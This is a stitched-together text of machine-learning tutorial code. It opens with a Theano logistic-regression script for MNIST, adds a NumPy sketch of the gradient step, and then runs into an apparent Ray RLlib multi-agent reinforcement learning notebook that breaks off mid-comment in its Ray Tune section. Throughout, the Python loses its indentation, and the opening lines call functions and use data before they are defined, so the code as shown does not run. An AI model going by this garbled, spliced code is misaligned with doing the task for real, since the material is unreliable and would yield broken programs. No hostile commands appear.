test_set_x,test_set_y=shared_dataset(test_set)
valid_set_x,valid_set_y=shared_dataset(valid_set)
train_set_x,train_set_y=shared_dataset(train_set)
batch_size=500
class LogisticRegression(object):
def __init__(self,input,n_in,n_out):
self.W=theano.shared(value=numpy.zeros((n_in,n_out),dtype=theano.config.floatX),name='W',borrow=True)
self.b=theano.shared(value=numpy.zeros((n_out,),dtype=theano.config.floatX),name='b',borrow=True)
self.p_y_given_x=T.nnet.softmax(T.dot(input,self.W)+self.b)
self.y_pred=T.argmax(self.p_y_given_x,axis=1)
self.params=[self.W,self.b]
self.input=input
def negative_log_likelihood(self,y):
return -T.mean(T.log(self.p_y_given_x[T.arange(y.shape[0]),y]))
def errors(self,y):
if y.ndim!=self.y_pred.ndim:
raise TypeError('y should have same shape as y.pred',('y',y.type,'y_pred',self.y_pred.type))
if y.dtype.startswith('int'):
return T.mean(T.neq(self.y_pred,y))
else:
raise NotImplementedError()
def load_data(dataset):
''' Loads the dataset
:type dataset: string
:param dataset: the path to the dataset (here MNIST)
'''
#############
# LOAD DATA #
#############
# Download the MNIST dataset if it is not present
data_dir, data_file = os.path.split(dataset)
if data_dir == "" and not os.path.isfile(dataset):
# Check if dataset is in the data directory.
new_path = os.path.join(
os.path.split(__file__)[0],
"..",
"data",
dataset
)
if os.path.isfile(new_path) or data_file == 'mnist.pkl.gz':
dataset = new_path
if (not os.path.isfile(dataset)) and data_file == 'mnist.pkl.gz':
from six.moves import urllib
origin = (
'http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz'
)
print('Downloading data from %s' % origin)
urllib.request.urlretrieve(origin, dataset)
print('... loading data')
# Load the dataset
with gzip.open(dataset, 'rb') as f:
try:
train_set, valid_set, test_set = pickle.load(f, encoding='latin1')
except:
train_set, valid_set, test_set = pickle.load(f)
# train_set, valid_set, test_set format: tuple(input, target)
# input is a numpy.ndarray of 2 dimensions (a matrix)
# where each row corresponds to an example. target is a
# numpy.ndarray of 1 dimension (vector) that has the same length as
# the number of rows in the input. It should give the target
# to the example with the same index in the input.
def shared_dataset(data_xy, borrow=True):
""" Function that loads the dataset into shared variables
The reason we store our dataset in shared variables is to allow
Theano to copy it into the GPU memory (when code is run on GPU).
Since copying data into the GPU is slow, copying a minibatch everytime
is needed (the default behaviour if the data is not in a shared
variable) would lead to a large decrease in performance.
"""
data_x, data_y = data_xy
shared_x = theano.shared(numpy.asarray(data_x,
dtype=theano.config.floatX),
borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y,
dtype=theano.config.floatX),
borrow=borrow)
# When storing data on the GPU it has to be stored as floats
# therefore we will store the labels as ``floatX`` as well
# (``shared_y`` does exactly that). But during our computations
# we need them as ints (we use labels as index, and if they are
# floats it doesn't make sense) therefore instead of returning
# ``shared_y`` we will have to cast it to int. This little hack
# lets ous get around this issue
return shared_x, T.cast(shared_y, 'int32')
test_set_x, test_set_y = shared_dataset(test_set)
valid_set_x, valid_set_y = shared_dataset(valid_set)
train_set_x, train_set_y = shared_dataset(train_set)
rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),
(test_set_x, test_set_y)]
return rval
from theano import function
import timeit
import six.moves.cPickle as pickle
def sgd_optimization_mnist(learning_rate=0.13,n_epochs=1000,dataset='mnist.pkl.gz',batch_size=600):
datasets=load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] // batch_size
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] // batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] // batch_size
index=T.lscalar()
x=T.matrix('x')
y=T.ivector('y')
classifier = LogisticRegression(input=x,n_in=28*28,n_out=10)
cost=classifier.negative_log_likelihood(y)
test_model=function(inputs=[index],outputs=classifier.errors(y),givens={
x: test_set_x[index*batch_size: (index+1)*batch_size],
y: test_set_y[index*batch_size: (index+1)*batch_size]
})
validate_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size: (index + 1) * batch_size],
y: valid_set_y[index * batch_size: (index + 1) * batch_size]
}
)
g_W=T.grad(cost=cost,wrt=classifier.W)
g_b=T.grad(cost=cost,wrt=classifier.b)
updates=[(classifier.W,classifier.W-learning_rate*g_W),
(classifier.b,classifier.b-learning_rate*g_b)]
train_model = theano.function(
inputs=[index],
outputs=cost,
updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
patience=5000
patience_increase=2
improvement_threshold=0.995
validation_frequency=min(n_train_batches,patience // 2)
best_validation_loss=numpy.inf
test_score=0
start_time=timeit.default_timer()
done_looping=False
epoch=0
while epoch < n_epochs and (not done_looping):
epoch += 1
for minibatch_index in range(n_train_batches):
minibatch_avg_cost=train_model(minibatch_index)
iter=(epoch-1)*n_train_batches + minibatch_index
if(iter+1)%validation_frequency==0:
validation_losses=[validate_model(i) for i in range(n_valid_batches)]
this_validation_loss=numpy.mean(validation_losses)
if this_validation_loss<best_validation_loss:
if this_validation_loss<best_validation_loss*improvement_threshold:
patience=max(patience,iter*patience_increase)
best_validation_loss=this_validation_loss
test_losses=[test_model(i) for i in range(n_test_batches)]
test_score=numpy.mean(test_losses)
with open('best_model.pkl','wb') as f:
pickle.dump(classifier,f)
if patience<=iter:
done_looping=True
break
end_time=timeit.default_timer()
print(
(
'Optimization complete with best validation score of %f %%, '
'with test performance %f %%'
)
% (best_validation_loss * 100., test_score * 100.)
)
def predict():
classifier = pickle.load(open('best_model.pkl', 'rb'))
predict_model=function([classifier.input],classifier.y_pred)
dataset='mnist.pkl.gz'
datasets=load_data(dataset)
test_set_x, test_set_y = datasets[2]
test_set_x = test_set_x.get_value()
# Predict the labels of the first 10 test examples.
predicted_values = predict_model(test_set_x[:10])
print('Predicted values for the first 10 examples in test set:')
print(predicted_values)
```
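The symbolic gradient-descent updates above (`classifier.W - learning_rate * g_W`, and the analogous one for `b`) can be sketched in plain NumPy for a softmax (multinomial logistic regression) classifier. This is only an illustration of the math: the toy data, shapes, and the `sgd_step` helper are all made up here and are not part of the Theano tutorial code:

```python
import numpy as np

def softmax(z):
    # Numerically stable softmax over the class axis.
    z = z - z.max(axis=1, keepdims=True)
    e = np.exp(z)
    return e / e.sum(axis=1, keepdims=True)

def sgd_step(W, b, x, y, lr=0.13):
    """One minibatch update of the negative log-likelihood,
    mirroring W -= lr * g_W and b -= lr * g_b from the graph above."""
    n = x.shape[0]
    p = softmax(x @ W + b)        # (n, n_out) class probabilities
    p[np.arange(n), y] -= 1.0     # dNLL/dlogits = probs - one_hot(y)
    g_W = x.T @ p / n             # gradient wrt weights
    g_b = p.mean(axis=0)          # gradient wrt biases
    return W - lr * g_W, b - lr * g_b

rng = np.random.default_rng(0)
x = rng.normal(size=(600, 784))           # one fake MNIST-sized minibatch
y = rng.integers(0, 10, size=600)         # fake labels
W, b = np.zeros((784, 10)), np.zeros(10)
W, b = sgd_step(W, b, x, y)
print(W.shape, b.shape)                   # (784, 10) (10,)
```

Theano builds the same `p - one_hot(y)` gradient automatically via `T.grad`; the sketch just makes that computation explicit.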
# Hands-on RL with Ray’s RLlib
## A beginner’s tutorial for working with multi-agent environments, models, and algorithms
<img src="images/pitfall.jpg" width=250> <img src="images/tesla.jpg" width=254> <img src="images/forklifts.jpg" width=169> <img src="images/robots.jpg" width=252> <img src="images/dota2.jpg" width=213>
### Overview
“Hands-on RL with Ray’s RLlib” is a beginner's tutorial for working with reinforcement learning (RL) environments, models, and algorithms using Ray's RLlib library. RLlib offers high scalability, a large selection of algorithms to choose from (offline, model-based, model-free, etc.), support for TensorFlow and PyTorch, and a unified API for a variety of applications. This tutorial includes a brief introduction to provide an overview of concepts (e.g. why RL?) before proceeding to RLlib (multi- and single-agent) environments, neural network models, hyperparameter tuning, debugging, student exercises, Q/A, and more. All code will be provided as .py files in a GitHub repo.
### Intended Audience
* Python programmers who want to get started with reinforcement learning and RLlib.
### Prerequisites
* Some Python programming experience.
* Some familiarity with machine learning.
* *Helpful, but not required:* Experience in reinforcement learning and Ray.
* *Helpful, but not required:* Experience with TensorFlow or PyTorch.
### Requirements/Dependencies
To get this notebook up and running on your local machine, follow these steps:
Install conda (https://www.anaconda.com/products/individual)
Then ...
#### Quick `conda` setup instructions (Linux):
```
$ conda create -n rllib python=3.8
$ conda activate rllib
$ pip install ray[rllib]
$ pip install tensorflow # <- either one works!
$ pip install torch # <- either one works!
$ pip install jupyterlab
```
#### Quick `conda` setup instructions (Mac):
```
$ conda create -n rllib python=3.8
$ conda activate rllib
$ pip install cmake "ray[rllib]"
$ pip install tensorflow # <- either one works!
$ pip install torch # <- either one works!
$ pip install jupyterlab
```
#### Quick `conda` setup instructions (Win10):
```
$ conda create -n rllib python=3.8
$ conda activate rllib
$ pip install ray[rllib]
$ pip install [tensorflow|torch] # <- either one works!
$ pip install jupyterlab
$ conda install pywin32
```
Also, for Win10 Atari support, we have to install atari_py from a different source (gym does not support Atari envs on Windows).
```
$ pip install git+https://github.com/Kojoley/atari-py.git
```
### Opening these tutorial files:
```
$ git clone https://github.com/sven1977/rllib_tutorials
$ cd rllib_tutorials
$ jupyter-lab
```
### Key Takeaways
* What is reinforcement learning and why RLlib?
* Core concepts of RLlib: Environments, Trainers, Policies, and Models.
* How to configure, hyperparameter-tune, and parallelize RLlib.
* RLlib debugging best practices.
### Tutorial Outline
1. RL and RLlib in a nutshell.
1. Defining an RL-solvable problem: Our first environment.
1. **Exercise No.1**: Environment loop.
(15min break)
1. Picking an algorithm and training our first RLlib Trainer.
1. Configurations and hyperparameters - Easy tuning with Ray Tune.
1. Fixing our experiment's config - Going multi-agent.
1. The "infinite laptop": Quick intro into how to use RLlib with Anyscale's product.
1. **Exercise No.2**: Run your own Ray RLlib+Tune experiment.
1. Neural network models - Provide your custom models using tf.keras or torch.nn.
(15min break)
1. Deeper dive into RLlib's parallelization architecture.
1. Specifying different compute resources and parallelization options through our config.
1. "Hacking in": Using callbacks to customize the RL loop and generate our own metrics.
1. **Exercise No.3**: Write your own custom callback.
1. "Hacking in (part II)" - Debugging with RLlib and PyCharm.
1. Checking on the "infinite laptop" - Did RLlib learn to solve the problem?
### Other Recommended Readings
* [Reinforcement Learning with RLlib in the Unity Game Engine](https://medium.com/distributed-computing-with-ray/reinforcement-learning-with-rllib-in-the-unity-game-engine-1a98080a7c0d)
<img src="images/unity3d_blog_post.png" width=400>
* [Attention Nets and More with RLlib's Trajectory View API](https://medium.com/distributed-computing-with-ray/attention-nets-and-more-with-rllibs-trajectory-view-api-d326339a6e65)
* [Intro to RLlib: Example Environments](https://medium.com/distributed-computing-with-ray/intro-to-rllib-example-environments-3a113f532c70)
## The RL cycle
<img src="images/rl-cycle.png" width=800>
### Coding/defining our "problem" via an RL environment.
We will use the following (adversarial) multi-agent environment
throughout this tutorial to demonstrate a large fraction of RLlib's
APIs, features, and customization options.
<img src="images/environment.png" width=800>
### A word or two on Spaces:
Spaces are used in ML to describe what possible/valid values inputs and outputs of a neural network can have.
RL environments also use them to describe what their valid observations and actions are.
Spaces are usually defined by their shape (e.g. 84x84x3 RGB images) and datatype (e.g. uint8 for RGB values between 0 and 255).
However, spaces can also be composed of other spaces (see Tuple or Dict spaces), or be simply discrete with n fixed possible values
(represented by integers). For example, in our game, where each agent can only go up/down/left/right, the action space is `Discrete(4)`
(no datatype or shape needs to be defined here). Our observation space is `MultiDiscrete([n, m])`, where n is the observing agent's position and m is the opposing agent's position. So if agent1 starts in the upper left corner and agent2 starts in the bottom right corner of an 8 x 8 grid, agent1's observation is `[0, 63]` and agent2's observation is `[63, 0]`.
<img src="images/spaces.png" width=800>
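As a quick sanity check of the `row * width + col` position encoding described above (plain Python; the `discrete_pos` helper name is made up for this snippet):

```python
def discrete_pos(row, col, width):
    # Flatten a (row, col) grid coordinate into a single Discrete index,
    # the same encoding the environment's observations use.
    return row * width + col % width

# The 8 x 8 example from above: agent1 upper-left, agent2 lower-right.
agent1 = discrete_pos(0, 0, width=8)   # -> 0
agent2 = discrete_pos(7, 7, width=8)   # -> 63

# Each agent observes [own position, opponent's position]:
print([agent1, agent2])  # agent1's obs: [0, 63]
print([agent2, agent1])  # agent2's obs: [63, 0]
```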
```
# Let's code our multi-agent environment.
import gym
from gym.spaces import Discrete, MultiDiscrete
import numpy as np
import random
from ray.rllib.env.multi_agent_env import MultiAgentEnv
class MultiAgentArena(MultiAgentEnv):
def __init__(self, config=None):
config = config or {}
# Dimensions of the grid.
self.width = config.get("width", 10)
self.height = config.get("height", 10)
# End an episode after this many timesteps.
self.timestep_limit = config.get("ts", 100)
self.observation_space = MultiDiscrete([self.width * self.height,
self.width * self.height])
# 0=up, 1=right, 2=down, 3=left.
self.action_space = Discrete(4)
# Reset env.
self.reset()
def reset(self):
"""Returns initial observation of next(!) episode."""
# Row-major coords.
self.agent1_pos = [0, 0] # upper left corner
self.agent2_pos = [self.height - 1, self.width - 1] # lower bottom corner
# Accumulated rewards in this episode.
self.agent1_R = 0.0
self.agent2_R = 0.0
# Reset agent1's visited fields.
self.agent1_visited_fields = set([tuple(self.agent1_pos)])
# How many timesteps have we done in this episode.
self.timesteps = 0
# Return the initial observation in the new episode.
return self._get_obs()
def step(self, action: dict):
"""
Returns (next observation, rewards, dones, infos) after having taken the given actions.
e.g.
`action={"agent1": action_for_agent1, "agent2": action_for_agent2}`
"""
# increase our time steps counter by 1.
self.timesteps += 1
# An episode is "done" when we reach the time step limit.
is_done = self.timesteps >= self.timestep_limit
# Agent2 always moves first.
# events = [collision|agent1_new_field]
events = self._move(self.agent2_pos, action["agent2"], is_agent1=False)
events |= self._move(self.agent1_pos, action["agent1"], is_agent1=True)
# Useful for rendering.
self.collision = "collision" in events
# Get observations (based on new agent positions).
obs = self._get_obs()
# Determine rewards based on the collected events:
r1 = -1.0 if "collision" in events else 1.0 if "agent1_new_field" in events else -0.5
r2 = 1.0 if "collision" in events else -0.1
self.agent1_R += r1
self.agent2_R += r2
rewards = {
"agent1": r1,
"agent2": r2,
}
# Generate a `done` dict (per-agent and total).
dones = {
"agent1": is_done,
"agent2": is_done,
# special `__all__` key indicates that the episode is done for all agents.
"__all__": is_done,
}
return obs, rewards, dones, {} # <- info dict (not needed here).
def _get_obs(self):
"""
Returns the obs dict (agent name -> [own pos, opponent pos] array) using each
agent's current row/col position.
"""
ag1_discrete_pos = self.agent1_pos[0] * self.width + \
(self.agent1_pos[1] % self.width)
ag2_discrete_pos = self.agent2_pos[0] * self.width + \
(self.agent2_pos[1] % self.width)
return {
"agent1": np.array([ag1_discrete_pos, ag2_discrete_pos]),
"agent2": np.array([ag2_discrete_pos, ag1_discrete_pos]),
}
def _move(self, coords, action, is_agent1):
"""
Moves an agent (agent1 iff is_agent1=True, else agent2) from `coords` (row/col) using the
given action (0=up, 1=right, etc.) and returns the set of resulting events:
"agent1_new_field" when agent1 enters a not-yet-visited field.
"collision" when the move would end on the other agent's position (the mover is blocked).
"""
orig_coords = coords[:]
# Change the row: 0=up (-1), 2=down (+1)
coords[0] += -1 if action == 0 else 1 if action == 2 else 0
# Change the column: 1=right (+1), 3=left (-1)
coords[1] += 1 if action == 1 else -1 if action == 3 else 0
# Solve collisions.
# Make sure, we don't end up on the other agent's position.
# If yes, don't move (we are blocked).
if (is_agent1 and coords == self.agent2_pos) or (not is_agent1 and coords == self.agent1_pos):
coords[0], coords[1] = orig_coords
# Agent2 blocked agent1 (agent1 tried to run into agent2)
# OR Agent2 bumped into agent1 (agent2 tried to run into agent1)
return {"collision"}
# No agent blocking -> check walls.
if coords[0] < 0:
coords[0] = 0
elif coords[0] >= self.height:
coords[0] = self.height - 1
if coords[1] < 0:
coords[1] = 0
elif coords[1] >= self.width:
coords[1] = self.width - 1
# If agent1 -> "new" if new tile covered.
if is_agent1 and not tuple(coords) in self.agent1_visited_fields:
self.agent1_visited_fields.add(tuple(coords))
return {"agent1_new_field"}
# No new tile for agent1.
return set()
def render(self, mode=None):
print("_" * (self.width + 2))
for r in range(self.height):
print("|", end="")
for c in range(self.width):
field = r * self.width + c % self.width
if self.agent1_pos == [r, c]:
print("1", end="")
elif self.agent2_pos == [r, c]:
print("2", end="")
elif (r, c) in self.agent1_visited_fields:
print(".", end="")
else:
print(" ", end="")
print("|")
print("‾" * (self.width + 2))
print(f"{'!!Collision!!' if self.collision else ''}")
print("R1={: .1f}".format(self.agent1_R))
print("R2={: .1f}".format(self.agent2_R))
print()
env = MultiAgentArena()
obs = env.reset()
# Agent1 will move down, Agent2 moves up.
obs, rewards, dones, infos = env.step(action={"agent1": 2, "agent2": 0})
env.render()
print("Agent1's x/y position={}".format(env.agent1_pos))
print("Agent2's x/y position={}".format(env.agent2_pos))
print("Env timesteps={}".format(env.timesteps))
```
## Exercise No 1
<hr />
<img src="images/exercise1.png" width=400>
In the cell above, we performed a `reset()` and a single `step()` call. To walk through an entire episode, one would normally call `step()` repeatedly (with different actions) until the returned `done` dict has the "agent1" or "agent2" (or "__all__") key set to True. Your task is to write an "environment loop" that runs for exactly one episode using our `MultiAgentArena` class.
Follow these instructions here to get this done.
1. `reset` the already created (variable `env`) environment to get the first (initial) observation.
1. Enter an infinite while loop.
1. Compute the actions for "agent1" and "agent2" calling `DummyTrainer.compute_action([obs])` twice (once for each agent).
1. Put the results of the action computations into an action dict (`{"agent1": ..., "agent2": ...}`).
1. Pass this action dict into the env's `step()` method, just like it's done in the above cell (where we do a single `step()`).
1. Check the returned `dones` dict for True (yes, episode is terminated) and if True, break out of the loop.
**Good luck! :)**
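If you want to check your loop structure against something concrete, here is the same pattern sketched against a stand-in environment. Everything below (`StubEnv`, the random `compute_action`) is invented for this sketch, so it mirrors the step-by-step instructions without spoiling the live-coding solution that uses `MultiAgentArena` and `dummy_trainer`:

```python
import numpy as np

class StubEnv:
    """Stand-in with MultiAgentArena's reset/step signatures
    (fixed observations, done after `ts` timesteps)."""
    def __init__(self, ts=100):
        self.timestep_limit = ts
        self.timesteps = 0

    def reset(self):
        self.timesteps = 0
        return {"agent1": np.array([0, 99]), "agent2": np.array([99, 0])}

    def step(self, action):
        self.timesteps += 1
        done = self.timesteps >= self.timestep_limit
        obs = {"agent1": np.array([0, 99]), "agent2": np.array([99, 0])}
        rewards = {"agent1": 0.0, "agent2": 0.0}
        dones = {"agent1": done, "agent2": done, "__all__": done}
        return obs, rewards, dones, {}

def compute_action(single_agent_obs):
    # Random stand-in for dummy_trainer.compute_action().
    return np.random.randint(4)

env = StubEnv(ts=100)
obs = env.reset()                                   # 1) reset the env
num_steps = 0
while True:                                         # 2) infinite loop
    a1 = compute_action(obs["agent1"])              # 3) per-agent actions
    a2 = compute_action(obs["agent2"])
    actions = {"agent1": a1, "agent2": a2}          # 4) action dict
    obs, rewards, dones, infos = env.step(actions)  # 5) step the env
    num_steps += 1
    if dones["__all__"]:                            # 7) break when done
        break
print(num_steps)  # 100
```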
```
class DummyTrainer:
"""Dummy Trainer class used in Exercise #1.
Use its `compute_action` method to get a new action for one of the agents,
given the agent's observation (a single discrete value encoding the field
the agent is currently in).
"""
def compute_action(self, single_agent_obs=None):
# Returns a random action for a single agent.
return np.random.randint(4) # Discrete(4) -> return rand int between 0 and 3 (incl. 3).
dummy_trainer = DummyTrainer()
# Check, whether it's working.
for _ in range(3):
# Get action for agent1 (providing agent1's and agent2's positions).
print("action_agent1={}".format(dummy_trainer.compute_action(np.array([0, 99]))))
# Get action for agent2 (providing agent2's and agent1's positions).
print("action_agent2={}".format(dummy_trainer.compute_action(np.array([99, 0]))))
print()
```
Write your solution code into this cell here:
```
# !LIVE CODING!
# Leave the following as-is. It'll help us with rendering the env in this very cell's output.
import time
from ipywidgets import Output
from IPython import display
import time
out = Output()
display.display(out)
with out:
# Solution to Exercise #1:
# Start coding here inside this `with`-block:
# 1) Reset the env.
# 2) Enter an infinite while loop (to step through the episode).
# 3) Calculate both agents' actions individually, using dummy_trainer.compute_action([individual agent's obs])
# 4) Compile the actions dict from both individual agents' actions.
# 5) Send the actions dict to the env's `step()` method to receive: obs, rewards, dones, info dicts
# 6) We'll do this together: Render the env.
# Don't write any code here (skip directly to 7).
out.clear_output(wait=True)
time.sleep(0.08)
env.render()
# 7) Check whether the episode is done; if yes, break out of the while loop.
# 8) Run it! :)
```
------------------
## 15 min break :)
------------------
### And now for something completely different:
#### Plugging in RLlib!
```
import numpy as np
import pprint
import ray
# Start a new instance of Ray (when running this tutorial locally) or
# connect to an already running one (when running this tutorial through Anyscale).
ray.init() # Hear the engine humming? ;)
# In case you encounter the following error during our tutorial: `RuntimeError: Maybe you called ray.init twice by accident?`
# Try: `ray.shutdown() + ray.init()` or `ray.init(ignore_reinit_error=True)`
```
### Picking an RLlib algorithm - We'll use PPO throughout this tutorial (one-size-fits-all-kind-of-algo)
<img src="images/rllib_algos.png" width=800>
https://docs.ray.io/en/master/rllib-algorithms.html#available-algorithms-overview
```
# Import a Trainable (one of RLlib's built-in algorithms):
# We use the PPO algorithm here b/c it's very flexible wrt its supported
# action spaces and model types, and b/c it learns almost any problem well.
from ray.rllib.agents.ppo import PPOTrainer
# Specify a very simple config, defining our environment and some environment
# options (see environment.py).
config = {
"env": MultiAgentArena, # "my_env" <- if we previously have registered the env with `tune.register_env("[name]", lambda config: [returns env object])`.
"env_config": {
"config": {
"width": 10,
"height": 10,
"ts": 100,
},
},
# !PyTorch users!
#"framework": "torch", # If users have chosen to install torch instead of tf.
"create_env_on_driver": True,
}
# Instantiate the Trainer object using above config.
rllib_trainer = PPOTrainer(config=config)
rllib_trainer
```
### Ready to train with RLlib's PPO algorithm
That's it, we are ready to train.
Calling `Trainer.train()` will execute a single "training iteration".
One iteration for most algos involves:
1) sampling from the environment(s)
2) using the sampled data (observations, actions taken, rewards) to update the policy model (neural network), such that it would pick better actions in the future, leading to higher rewards.
Let's try it out:
```
results = rllib_trainer.train()
# Delete the config from the results for clarity.
# Only the stats will remain, then.
del results["config"]
# Pretty print the stats.
pprint.pprint(results)
```
### Going from single policy (RLlib's default) to multi-policy:
So far, our experiment has been ill-configured, because both
agents, which should behave differently due to their different
tasks and reward functions, learn the same policy: the "default_policy",
which RLlib always provides if you don't configure anything else.
Remember that RLlib does not know at Trainer setup time how many agents (and which
ones) the environment will "produce". Agent control (adding agents, removing them, terminating
episodes for agents) is entirely in the Env's hands.
Let's fix our single policy problem and introduce the "multiagent" API.
<img src="images/from_single_agent_to_multi_agent.png" width=800>
In order to turn on RLlib's multi-agent functionality, we need two things:
1. A policy mapping function, mapping agent IDs (e.g. a string like "agent1", produced by the environment in the returned observation/rewards/dones-dicts) to a policy ID (another string, e.g. "policy1", which is under our control).
1. A policies definition dict, mapping policy IDs (e.g. "policy1") to 4-tuples consisting of 1) policy class (None for using the default class), 2) observation space, 3) action space, and 4) config overrides (empty dict for no overrides and using the Trainer's main config dict).
Let's take a closer look:
```
# Define the policies definition dict:
# Each policy in there is defined by its ID (key) mapping to a 4-tuple (value):
# - Policy class (None for using the "default" class, e.g. PPOTFPolicy for PPO+tf or PPOTorchPolicy for PPO+torch).
# - obs-space (we get this directly from our already created env object).
# - act-space (we get this directly from our already created env object).
# - config-overrides dict (leave empty for using the Trainer's config as-is)
policies = {
"policy1": (None, env.observation_space, env.action_space, {}),
"policy2": (None, env.observation_space, env.action_space, {"lr": 0.0002}),
}
# Note that now we won't have a "default_policy" anymore, just "policy1" and "policy2".
# Define an agent->policy mapping function.
# Which agents (defined by the environment) use which policies (defined by us)?
# The mapping here is M (agents) -> N (policies), where M >= N.
def policy_mapping_fn(agent_id: str):
# Make sure agent ID is valid.
assert agent_id in ["agent1", "agent2"], f"ERROR: invalid agent ID {agent_id}!"
# Map agent1 to policy1, and agent2 to policy2.
return "policy1" if agent_id == "agent1" else "policy2"
# We could - if we wanted - specify, which policies should be learnt (by default, RLlib learns all).
# Non-learnt policies will be frozen and not updated:
# policies_to_train = ["policy1", "policy2"]
# Adding the above to our config.
config.update({
"multiagent": {
"policies": policies,
"policy_mapping_fn": policy_mapping_fn,
# We'll leave this empty: Means, we train both policy1 and policy2.
# "policies_to_train": policies_to_train,
},
})
pprint.pprint(config)
print()
print(f"agent1 is now mapped to {policy_mapping_fn('agent1')}")
print(f"agent2 is now mapped to {policy_mapping_fn('agent2')}")
# Recreate our Trainer (we cannot just change the config on-the-fly).
rllib_trainer.stop()
# Using our updated (now multiagent!) config dict.
rllib_trainer = PPOTrainer(config=config)
rllib_trainer
```
Now that we are set up correctly with two policies as per our "multiagent" config, let's call `train()` on the new Trainer several times (what about 10 times?).
```
# Run `train()` n times. Repeatedly call `train()` now to see rewards increase.
# Move on once you see (agent1 + agent2) episode rewards of 10.0 or more.
for _ in range(10):
results = rllib_trainer.train()
print(f"Iteration={rllib_trainer.iteration}: R(\"return\")={results['episode_reward_mean']}")
# Do another loop, but this time, we will print out each policies' individual rewards.
for _ in range(10):
results = rllib_trainer.train()
r1 = results['policy_reward_mean']['policy1']
r2 = results['policy_reward_mean']['policy2']
r = r1 + r2
print(f"Iteration={rllib_trainer.iteration}: R(\"return\")={r} R1={r1} R2={r2}")
```
#### !OPTIONAL HACK! (<-- we will not do these during the tutorial, but feel free to try these cells by yourself)
Use the above solution of Exercise #1 and replace our `dummy_trainer` in that solution
with the now trained `rllib_trainer`. You should see a better performance of the two agents.
However, keep in mind that agent1 will typically look better here, as it has the
"easier" task for collecting high rewards.
#### !OPTIONAL HACK!
Feel free to play around with the following code in order to learn how RLlib - under the hood - calculates actions from the environment's observations, using the Policies and their model(s) inside our Trainer object:
```
# Let's actually "look inside" our Trainer to see what's in there.
from ray.rllib.utils.numpy import softmax
# To get to one of the policies inside the Trainer, use `Trainer.get_policy([policy ID])`:
policy = rllib_trainer.get_policy("policy1")
print(f"Policy 'policy1' is: {policy}")
# To get to the model inside any policy, do:
model = policy.model
#print(f"Our Policy's model is: {model}")
# Print out the policy's action and observation spaces.
print(f"Our Policy's observation space is: {policy.observation_space}")
print(f"Our Policy's action space is: {policy.action_space}")
# Produce a random observation (B=1; batch of size 1).
obs = np.array([policy.observation_space.sample()])
# Alternatively for PyTorch:
#import torch
#obs = torch.from_numpy(obs)
# Get the action logits (as tf tensor).
# If you are using torch, you would get a torch tensor here.
logits, _ = model({"obs": obs})
logits
# Numpyize the tensor by running `logits` through the Policy's own tf.Session.
logits_np = policy.get_session().run(logits)
# For torch, you can simply do: `logits_np = logits.detach().cpu().numpy()`.
# Convert logits into action probabilities and remove the B=1.
action_probs = np.squeeze(softmax(logits_np))
# Sample an action, using the probabilities.
action = np.random.choice([0, 1, 2, 3], p=action_probs)
# Print out the action.
print(f"sampled action={action}")
```
### Saving and restoring a trained Trainer.
Currently, `rllib_trainer` is in an already trained state.
It holds optimized weights in its Policy's model that allow it to act
already somewhat smart in our environment when given an observation.
However, if we closed this notebook right now, all the effort would have been for nothing.
Let's therefore save the state of our trainer to disk for later!
```
# We use the `Trainer.save()` method to create a checkpoint.
checkpoint_file = rllib_trainer.save()
print(f"Trainer (at iteration {rllib_trainer.iteration}) was saved in '{checkpoint_file}'!")
# Here is what a checkpoint directory contains:
print("The checkpoint directory contains the following files:")
import os
os.listdir(os.path.dirname(checkpoint_file))
```
### Restoring and evaluating a Trainer
In the following cell, we'll learn how to restore a saved Trainer from a checkpoint file.
We'll also evaluate a completely new Trainer (should act more or less randomly) vs an already trained one (the one we just restored from the created checkpoint file).
```
# Pretend, we wanted to pick up training from a previous run:
new_trainer = PPOTrainer(config=config)
# Evaluate the new trainer (this should yield random results).
results = new_trainer.evaluate()
print(f"Evaluating new trainer: R={results['evaluation']['episode_reward_mean']}")
# Restoring the trained state into the `new_trainer` object.
print(f"Before restoring: Trainer is at iteration={new_trainer.iteration}")
new_trainer.restore(checkpoint_file)
print(f"After restoring: Trainer is at iteration={new_trainer.iteration}")
# Evaluate again (this should yield results we saw after having trained our saved agent).
results = new_trainer.evaluate()
print(f"Evaluating restored trainer: R={results['evaluation']['episode_reward_mean']}")
```
In order to release all resources from a Trainer, you can use a Trainer's `stop()` method.
You should definitely run this cell, as it frees resources that we'll need later in this tutorial, when we'll do parallel hyperparameter sweeps.
```
rllib_trainer.stop()
new_trainer.stop()
```
### Moving stuff to the professional level: RLlib in connection w/ Ray Tune
Running any experiments through Ray Tune is the recommended way of doing things with RLlib. If you look at our
<a href="https://github.com/ray-project/ray/tree/master/rllib/examples">examples scripts folder</a>, you will see that almost all of the scripts use Ray Tune to run the particular RLlib workload demonstrated in each script.
<img src="images/rllib_and_tune.png" width=400>
When setting up hyperparameter sweeps for Tune, we'll do this in our already familiar config dict.
So let's take a quick look at our PPO algo's default config to understand which hyperparameters we may want to play around with:
```
# Configuration dicts and Ray Tune.
# Where are the default configuration dicts stored?
# PPO algorithm:
from ray.rllib.agents.ppo import DEFAULT_CONFIG as PPO_DEFAULT_CONFIG
print(f"PPO's default config is:")
pprint.pprint(PPO_DEFAULT_CONFIG)
# DQN algorithm:
#from ray.rllib.agents.dqn import DEFAULT_CONFIG as DQN_DEFAULT_CONFIG
#print(f"DQN's default config is:")
#pprint.pprint(DQN_DEFAULT_CONFIG)
# Common (all algorithms).
#from ray.rllib.agents.trainer import COMMON_CONFIG
#print(f"RLlib Trainer's default config is:")
#pprint.pprint(COMMON_CONFIG)
```
### Let's do a very simple grid-search over two learning rates with tune.run().
In particular, we will try the learning rates 0.00005 and 0.5 using `tune.grid_search([...])`
inside our config dict:
```
# Plugging in Ray Tune.
# Note that this is the recommended way to run any experiments with RLlib.
# Reasons:
# - Tune allows you to do hyperparameter tuning in a user-friendly way
# and at large scale!
# - Tune automatically allocates needed resources for the different
